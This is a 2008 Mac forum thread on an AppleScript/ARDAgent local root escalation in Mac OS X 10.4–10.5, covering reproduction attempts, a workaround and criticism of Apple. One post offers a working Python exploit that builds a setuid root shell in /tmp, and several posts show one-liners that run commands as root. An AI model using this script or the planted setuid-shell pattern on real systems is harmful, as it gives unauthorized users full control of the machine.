Mac OS X Local root escalation vulnerability

Discussion in 'macOS' started by zorinlynx, Jun 18, 2008.

  1. zorinlynx macrumors 603


    May 31, 2007
    Florida, USA
    From Slashdot:

    "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not."

    If you administrate Mac OS X systems in a lab environment where local users shouldn't be able to get root, this can affect you. Thankfully for most of us, the user must be logged in *locally* (into the window system) for this to work.

    A quick workaround is to remove the suid bit on the ARDAgent:

    sudo chmod u-s /System/Library/CoreServices/RemoteManagement/

    This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
  2. SC68Cal macrumors 68000

    Feb 23, 2006
    Local privilege escalation.

    import commands
    payload="echo 'int main() { setuid(0); setgid(0); seteuid(0); system(\"/bin/sh -i\"); }' > /tmp/r00t.c"
    buildcmd="gcc /tmp/r00t.c -o /tmp/r00ted"
    escalate="osascript -e 'tell app \"ARDAgent\" to do shell script \"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'"
    print 'Building your shell', commands.getoutput(payload), commands.getoutput(buildcmd)
    print commands.getoutput(escalate)
    print "r00t is located at /tmp/r00ted"
    Have fun.
  3. cdlxxvi macrumors newbie

    Apr 30, 2008
    Don't worry, guys, knowing Apple's serious treating of known vulnerabilities (Safari carpet bombing being the prime example), we can expect an update any year now :rolleyes:
  4. Phil A. Moderator

    Phil A.

    Staff Member

    Apr 2, 2006
    Shropshire, UK
    There is no way of defending this - it is a massive hole and Apple should hang their heads in shame. Why the hell does ARDAgent have the SUID bit set when it can run shell scripts?!
    It would be trivial to use this exploit to install a trojan with root privileges and without and secondary authentication and the question has to be are there any more of these hidden away in OS X?
    The Apple world just got a bit more dangerous...
  5. SC68Cal macrumors 68000

    Feb 23, 2006
    I would consider all binaries that Apple has given SUID bits to suspect. They've proven that they can't be trusted with them.

  6. subaqua macrumors member

    Jan 15, 2008
    I cannot reproduce this on my Leopard system:

    (spartan) ~ % osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
    23:47: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)

    (spartan) ~ % uname -a
    Darwin 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386

    My copy of ARDAgent has the suid bit set but I don't appear to be vulnerable...

    (spartan) ~ % ls -l /System/Library/CoreServices/RemoteManagement/
    -rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/*

    I am logged into the desktop running the above commands from terminal app.

    Was this fixed in 10.5.1, 10.5.2, or 10.5.3 already?

  7. priller macrumors regular

    Dec 15, 2007
    Still worked with 10.5.3 for me

    gamma:~ priller$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

  8. mojococo macrumors newbie

    Jun 19, 2008
    None of those are scriptable.
  9. SC68Cal macrumors 68000

    Feb 23, 2006
    Who said that they needed to be scriptable? You've got your blinders on.
  10. mojococo macrumors newbie

    Jun 19, 2008
    If Remote Desktop is enabled ARDAgent will already be running as the local user, launchd ignores setuid.
  11. mojococo macrumors newbie

    Jun 19, 2008
    The OP. Don't post what you don't understand.
  12. Random Chaos macrumors member

    Jan 16, 2008
    And as was said, fully exploitable via scripts. For instance, make a nicely trusted AppleScript, saved as an Application:

    on run
    	do shell script "osascript -e 'tell app \"ARDAgent\" to do shell script \"say quack\"'"
    end run
    You'll notice that it says it with the default voice, not the one set for your account.

    So how long before we see malware or trojans?
  13. mojococo macrumors newbie

    Jun 19, 2008
    You don't need to use osascript if you're already in an applescript!

    on run
    	tell app "ARDAgent" to do shell script \"say quack\"
    end run
  14. SC68Cal macrumors 68000

    Feb 23, 2006
  15. mojococo macrumors newbie

    Jun 19, 2008
    If you have something useful to say about setuid binaries, post it.
  16. martychang macrumors regular

    Sep 3, 2007
    That MOAB 15 bug is scary stuff :eek:
    I read Rixstep regularly so I'm not entirely sure how I missed that.

    I want to love you Apple, but you make it so hard :(
  17. Iroganai macrumors regular


    Oct 18, 2003
    First, this should be posted on the top page of Macrumors.
    Second, to SC68CAL, "do shell script" is not really the functionality of ARDagent; it is there FOR ANY SCRIPTABLE APP as a part of the AppleScript-ability and any GUI app which is registered to LaunchServices can be sent an AppleEvent.
    Apple is to blame to have AppleScript-ability for the setuid apps. It's a gaping hole in the security !

    In your list of setuid'ed executables, the only other GUI app is
    osascript -e 'tell app "check_afp" to do shell script "whoami" '
    didn't "work" on my machine. Mmm ...
  18. lugesm macrumors 6502a


    Sep 7, 2007
    For a relative Mac newbie most of the above posts read like Greek. :confused:

    Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
  19. martychang macrumors regular

    Sep 3, 2007
    Not really, any Malware's first goal, trojan or otherwise, is to make sure nobody can see it. This is why Windows users have such problems, even when they run all kinds of security programs: you basically have to be familiar with what's supposed to be on the system, and spot things that look fishy.

Share This Page